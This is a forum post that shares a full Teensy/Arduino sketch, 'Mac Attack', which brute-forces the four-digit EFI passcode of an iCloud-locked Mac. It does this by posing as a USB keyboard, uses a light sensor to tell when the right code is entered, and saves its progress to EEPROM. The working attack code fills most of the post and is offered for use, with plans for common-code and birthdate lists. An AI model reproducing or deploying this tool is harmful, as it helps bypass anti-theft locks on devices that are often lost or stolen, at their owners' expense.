- Posts: 21
- Thank you received: 0
Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
thaGH05T wrote: Well, nobody has given me any feedback which I find pretty strange since I made huge improvements on the code. Even though nobody is following this yet I have updated the code to do the following:
- Use 4 digit 7 segment display to show entered key and display saved/found key.
- Save last entered key into EEPROM in case of power failure and to preserve found key.
- Improved variable declarations for ease of use and customization.
- Improved LDR logic for detecting when the correct code is entered.
I will be taking a video for demonstration and instructional use soon.../*******************************************************************************************\ | TITLE: Mac Attack DATE: 1/27/2016 MODIFIED: 3/13/2016 | | AUTHOUR: John Neal ALIAS: thaGH05T | | ----------------------------------------------------------------------------------------- | | LICENCE: This work is licensed under the Creative | | Commons Attribution-ShareAlike 4.0 International License. To view a copy of this license, | | visit http://creativecommons.org/licenses/by-sa/4.0/. | | ----------------------------------------------------------------------------------------- | | DESCRIPTION: This sketch will methodically brute force the EFI passcode of a Mac if it | | has been locked down by iCloud and the EFI passcode has not been previousely set. | | Additioonally it is able to detect when the correct code has been entered by using an LDR.| | ----------------------------------------------------------------------------------------- | | TO-DO: Add common 4 digit codes as well as birthdate ranges. Add buttons for quick | | variable setting. Port over to LCD for usability and versatility of configuration and | | attack methods. | \*******************************************************************************************/ /*******************************************************************************************\ | WARNING: This sketch potentially writes 10,000 times to a single address of memory. | | Each address can become unreadable after 100,000 writes, so it is recommended that you | | change saveAddress before each use. | \*******************************************************************************************/ #include <usb_keyboard.h> #include <SevSeg.h> #include <EEPROM.h> const int readPin = A0; // Analog read pin of the LDR. const int ledPin = 13; // Led Pin, 13 on Teensy 3.1. const char* digits = "%04d"; // sprintf() format, %04d = 4 digits. int bfDigits = 9999; // Brute force eventuallity, how hight to count. int iterDelay = 14000; // Iteration delay, adjust as needed. int lightThresh = 100; // Threshold of LDR, depends on resistor value. int saveAddress = 1337; // Addrress where the last entered digit is stored. byte numDigits = 4; // Number of digits your 7 segment display has. byte digitPins[] = {9, 10, 11, 12}; // Digit pins, has to be in order from first to last digit. byte segmentPins[] = {1, 2, 3, 4, 5, 6, 7, 8}; // Segment pins, has to be in order from A to G. Last array object should be the "." dot. char code[4]; // Define the how many digits are in the code array. (change this to the count of bfGigits) int setupDelay = 5000; // This is the time in millisecons that the EFI code or last number entered will be displayed as well as how --> // long the initial countdown to start brute forcing will be. SevSeg sevseg; //Instantiate a seven segment object. void setup() { sevseg.begin(COMMON_ANODE, numDigits, digitPins, segmentPins); sevseg.setBrightness(10); keyboard_modifier_keys = 0; pinMode(ledPin, OUTPUT); //Serial.begin(9600); // Begin serial if calibrating lightThresh. int efiStartTime = millis(); int efiEndTime = efiStartTime; int savedEFI = readWord(saveAddress); while ((efiEndTime - efiStartTime) <= setupDelay){ sevseg.setNumber(savedEFI,5); sevseg.refreshDisplay(); efiEndTime = millis(); } } int bfCount = 0; //readWord(saveAddress); // Determines where to start the brute force count. "0" To begin BF, "readWord(saveAddress)" to start from power failure. int doOnce = 1; void loop(){ if (doOnce == 1){ int startTime = millis(); int endTime = startTime; while ((endTime - startTime) <= setupDelay + 10){ int delayMath = endTime / 1000 - 10; int modDelay = delayMath * -1; sevseg.setNumber(modDelay,5); sevseg.refreshDisplay(); endTime = millis(); } doOnce = 0; } int lightVal = analogRead(readPin); //Serial.println(lightVal); // Print LDR value to serial to manually determine lightThresh. if (lightVal < lightThresh){ if (bfCount <= bfDigits){ sprintf(code, digits, bfCount); for (int i=0; i < 4; i++){ digitalWrite(ledPin, HIGH); Keyboard.press(code[i]); delay(200); digitalWrite(ledPin, LOW); Keyboard.release(code[i]); delay(200); } Keyboard.press(KEY_ENTER); delay(200); Keyboard.release(KEY_ENTER); int startTime = millis(); int endTime = startTime; while ((endTime - startTime) <= iterDelay){ sevseg.setNumber(bfCount,5); sevseg.refreshDisplay(); endTime = millis(); } bfCount++; writeWord(saveAddress, bfCount); } else if (bfCount > bfDigits){ while (1){ for (int i=0; i < 3; i++){ digitalWrite(ledPin, HIGH); delay(100); digitalWrite(ledPin, LOW); delay(100); } delay(500); } } } else if (lightVal > lightThresh){ writeWord(saveAddress, bfCount); while (1){ sevseg.setNumber(bfCount,5); sevseg.refreshDisplay(); } } } void writeWord(unsigned address, unsigned value){ EEPROM.write(address, highByte(value)); EEPROM.write(address+1, lowByte(value)); } unsigned readWord(unsigned address){ return word(EEPROM.read(address), EEPROM.read(address+1)); }
For those of you who are thinking this is too good to be true, your'e welcome. For those of you who have no idea what to do with this, don't worry the tutorial is coming soon and I will be creating a shield for the Teensy xx
Please Log in or Create an account to join the conversation.
We have 429 guests and no members online
This website uses cookies to manage authentication, navigation, and other functions. By using our website, you agree that we can place these types of cookies on your device.
You have declined cookies. This decision can be reversed.
You have allowed cookies to be placed on your computer. This decision can be reversed.
This website uses cookies to manage authentication, navigation, and other functions. By using our website, you agree that we can place these types of cookies on your device.